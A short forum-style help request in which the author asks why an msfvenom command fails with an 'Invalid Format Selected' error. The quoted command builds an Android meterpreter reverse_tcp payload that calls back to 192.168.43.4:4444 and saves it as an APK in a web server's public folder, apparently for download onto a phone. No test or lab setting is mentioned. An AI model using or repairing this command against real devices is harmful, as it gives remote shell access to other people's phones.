today after a long time I was trying to make a payload for android but I got an error there which is
"Error: Invalid Format Selected"
this is the command:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o /var/www/html/files.apk
I tried making payload for windows, but it worked successfully. what should I do now